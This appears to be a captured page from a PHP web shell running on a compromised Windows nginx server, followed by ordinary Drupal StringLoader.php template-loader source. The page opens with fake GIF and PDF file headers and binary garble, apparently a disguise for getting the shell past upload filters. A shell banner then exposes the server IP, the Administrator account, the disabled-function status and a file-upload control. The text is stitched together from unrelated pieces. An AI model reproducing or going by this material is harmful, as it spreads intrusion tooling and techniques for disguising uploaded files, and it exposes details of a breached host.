GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Template/Loader/ |
Upload File : |
<?php namespace Drupal\Core\Template\Loader; /** * Loads string templates, also known as inline templates. * * This loader is intended to be used in a Twig loader chain and whitelists * string templates that begin with the following comment: * @code * {# inline_template_start #} * @endcode * * This class override ensures that the string loader behaves as expected in * the loader chain. If Twig's string loader is used as is, any string (even a * reference to a file-based Twig template) is treated as a valid template and * is rendered instead of a \Twig_Error_Loader exception being thrown. * * @see \Drupal\Core\Template\TwigEnvironment::renderInline() * @see \Drupal\Core\Render\Element\InlineTemplate * @see twig_render_template() */ class StringLoader implements \Twig_LoaderInterface, \Twig_ExistsLoaderInterface { /** * {@inheritdoc} */ public function exists($name) { if (strpos($name, '{# inline_template_start #}') === 0) { return TRUE; } else { return FALSE; } } /** * {@inheritdoc} */ public function getSource($name) { return $name; } /** * {@inheritdoc} */ public function getCacheKey($name) { return $name; } /** * {@inheritdoc} */ public function isFresh($name, $time) { return TRUE; } }